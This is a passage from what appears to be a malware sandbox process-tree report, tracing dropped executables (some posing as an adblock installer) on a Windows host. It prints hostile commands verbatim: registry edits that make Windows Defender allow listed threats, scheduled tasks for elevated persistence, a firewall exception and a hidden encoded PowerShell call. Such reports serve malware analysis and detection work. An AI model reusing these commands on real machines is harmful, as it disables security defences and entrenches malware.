                                                                                                                                        where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
                                                                                                                                        9⤵
                                                                                                                                          PID:5244
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c cmd < Affaticato.hopp & ping -n 5 localhost
                                                                                                                                          9⤵
                                                                                                                                            PID:6320
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd
                                                                                                                                              10⤵
                                                                                                                                                PID:6928
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hosygjrd.a5v\HD2.exe & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:3184
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hosygjrd.a5v\HD2.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\hosygjrd.a5v\HD2.exe
                                                                                                                                              8⤵
                                                                                                                                                PID:6008
                                                                                                                                                • C:\Windows\SysWOW64\where.exe
                                                                                                                                                  where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
                                                                                                                                                  9⤵
                                                                                                                                                    PID:5464
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c cmd < Sia.midi & ping -n 5 localhost
                                                                                                                                                    9⤵
                                                                                                                                                      PID:6340
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd
                                                                                                                                                        10⤵
                                                                                                                                                          PID:6984
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qwlkwnoa.xpn\toolspab3.exe & exit
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5156
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qwlkwnoa.xpn\toolspab3.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\qwlkwnoa.xpn\toolspab3.exe
                                                                                                                                                        8⤵
                                                                                                                                                          PID:2332
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\qwlkwnoa.xpn\toolspab3.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\qwlkwnoa.xpn\toolspab3.exe
                                                                                                                                                            9⤵
                                                                                                                                                              PID:6804
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fywtvpql.0db\rmaa1045.exe & exit
                                                                                                                                                          7⤵
                                                                                                                                                            PID:6048
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fywtvpql.0db\rmaa1045.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\fywtvpql.0db\rmaa1045.exe
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6568
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 6568 -s 696
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6532
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oof0fqnm.jur\CiTuDrb.exe & exit
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3056
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\oof0fqnm.jur\CiTuDrb.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\oof0fqnm.jur\CiTuDrb.exe
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:6640
                                                                                                                                                                    • C:\Windows\SysWOW64\where.exe
                                                                                                                                                                      where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:6792
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /c cmd < Gurge.mov & ping -n 5 localhost
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:7028
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:6748
                                                                                                                                                                    • C:\Program Files\Uninstall Information\BPQFYLXAWI\poweroff.exe
                                                                                                                                                                      "C:\Program Files\Uninstall Information\BPQFYLXAWI\poweroff.exe" /VERYSILENT
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2672
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1BT9E.tmp\poweroff.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-1BT9E.tmp\poweroff.tmp" /SL5="$301FE,490199,350720,C:\Program Files\Uninstall Information\BPQFYLXAWI\poweroff.exe" /VERYSILENT
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:436
                                                                                                                                                                            • C:\Program Files (x86)\powerOff\Power Off.exe
                                                                                                                                                                              "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1760
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1188
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-AK0SU.tmp\AdblockInstaller.exe.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-AK0SU.tmp\AdblockInstaller.exe.tmp" /SL5="$701D0,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3688
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:2608
                                                                                                                                                                            • C:\Users\Admin\Programs\Adblock\Adblock.exe
                                                                                                                                                                              "C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=b975079f1659625318 --downloadDate=2022-08-04T15:01:38 --distId=marketator --pid=747
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1056
                                                                                                                                                                                • C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
                                                                                                                                                                                  C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\4dd3a2f0-6f54-4bdb-ebe9-8b3cb7eafb78.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\4dd3a2f0-6f54-4bdb-ebe9-8b3cb7eafb78.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\4dd3a2f0-6f54-4bdb-ebe9-8b3cb7eafb78.run\__sentry-breadcrumb2" --initial-client-data=0x484,0x488,0x48c,0x460,0x490,0x7ff6257cbc80,0x7ff6257cbca0,0x7ff6257cbcb8
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4280
                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                    C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                    PID:112
                                                                                                                                                                                  • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                                    C:\Users\Admin\Programs\Adblock\DnsService.exe -install
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5504
                                                                                                                                                                                    • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                                      C:\Users\Admin\Programs\Adblock\DnsService.exe -start
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5732
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      "cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3564
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5004
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          "cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:3440
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                              PID:5344
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:700
                                                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                          "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3332
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:5292
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                              PID:1604
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                              PID:528
                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 452 -p 3700 -ip 3700
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2624
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4284 -ip 4284
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1320
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:228
                                                                                                                                                                                                • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                                                  C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5788
                                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1988 -ip 1988
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6596
                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 472 -p 6568 -ip 6568
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3864
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1900
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 600
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:5980
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:6256
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1900 -ip 1900
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:6160
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\pGKOFWR.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\pGKOFWR.exe Yz /site_id 525403 /S
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6740
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5660
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6408
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6580
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:6628
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6992
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1188
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3264
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6064
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5308
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3708
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3712
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5508
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3472
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:6048
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5244
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:6600
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4884
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1500
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:4604
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6920
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:6528
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3992
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2540
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
